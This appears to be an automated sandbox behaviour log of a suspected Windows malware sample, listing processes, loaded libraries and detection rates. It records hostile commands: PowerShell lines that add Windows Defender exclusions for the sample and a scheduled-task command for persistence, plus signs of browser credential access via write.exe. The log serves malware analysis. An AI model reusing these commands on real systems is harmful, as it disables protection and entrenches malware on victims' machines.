            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
            Source: C:\Users\user\Desktop\CFV20240600121.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA2C.tmpJump to behavior
            Source: CFV20240600121.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: CFV20240600121.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\CFV20240600121.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: BPSHhDGmARC.exe.0.drBinary or memory string: INSERT INTO [t_log] (logtime, guest_id, log_type) VALUES (getdate(), @guestId, @typeLog);
            Source: write.exe, 00000015.00000003.2560793646.0000000003053000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4523478744.0000000003084000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2560668534.0000000003032000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4523478744.0000000003053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CFV20240600121.exeReversingLabs: Detection: 28%
            Source: CFV20240600121.exeVirustotal: Detection: 41%
            Source: C:\Users\user\Desktop\CFV20240600121.exeFile read: C:\Users\user\Desktop\CFV20240600121.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"Jump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
